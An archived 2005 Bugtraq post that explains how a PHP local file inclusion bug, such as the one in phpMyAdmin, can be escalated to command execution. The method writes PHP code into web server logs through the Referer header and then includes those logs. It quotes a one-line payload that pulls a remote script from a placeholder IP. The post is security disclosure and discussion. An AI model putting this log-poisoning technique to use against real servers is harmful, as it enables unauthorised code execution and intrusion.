lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 11 Oct 2005 18:34:15 +0200
From: Andreas Zeidler <az@...c.de>
To: Bugtraq <bugtraq@...urityfocus.com>
Cc: Maksymilian Arciemowicz <max@...tsuper.pl>
Subject: using php local file include vulnerabilities for command execution

hi,

this is a comment on the recent phpmyadmin vulnerability[1] discovered
by maksymilian arciemowicz.  i didn't really know where to post this,
so i hope this is the right place.

anyway, since i've used a file inclusion vulnerability in an older
version of phpmyadmin as a starting point for a security analysis last
weekend, and came up with a rather simple idea of how to use it for
unprivileged script execution of remote php code, i thought i'd post
this here.  actually i think this method could be used on any php-based
local include vuln, so i was wondering why i couldn't yet find anything
about it on the net...

okay, the problem with local file vulns is of course, that the contents
of the file being read are not evaluated.  but given php's include
statement the are -- if they contain a valid php statement.  now instead
of trying to upload a file containing php code (which wasn't possible in
my case), i ask myself if there was a way to use the server to create it
for me?

the idea that hit me before falling asleep was to send the code i needed
(like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the
referer string, this way having the web server write it into a file for
me, and in a second step simply use the already existent local file vuln
to read and the server's log file and this way execute the code.

of course this method doesn't always work.  php mustn't run in safe
mode, the web server has to log referer strings and the log files must
be accessible after privileges have been dropped.  since most people are
logging in combined format, i guess the last requirement is the most
critical one, but many logs are world-readable nevertheless.  also,
enabled url-based includes make things easier, but they're not stricly
necessary.

so, provided with a php local file vuln and readable log files,
executing arbitrary commands comes down to locating a suitable log file
to include.  with a little guessing and the ability to read files (i.e.
the server configuration) this is not too difficult.

that's it.  any comments and feedback about this is most welcome,
especially since this approach seems much too simple to not having been
used before.  maybe someone can just point me to an already existing
discussion about this... :)

regards,


andi

[1] http://www.securityfocus.com/bid/15053

-- 
zeidler it consulting - http://zitc.de/ - info@...c.de
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
keine softwarepatente in europa! - http://noepatents.eu.org/

Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ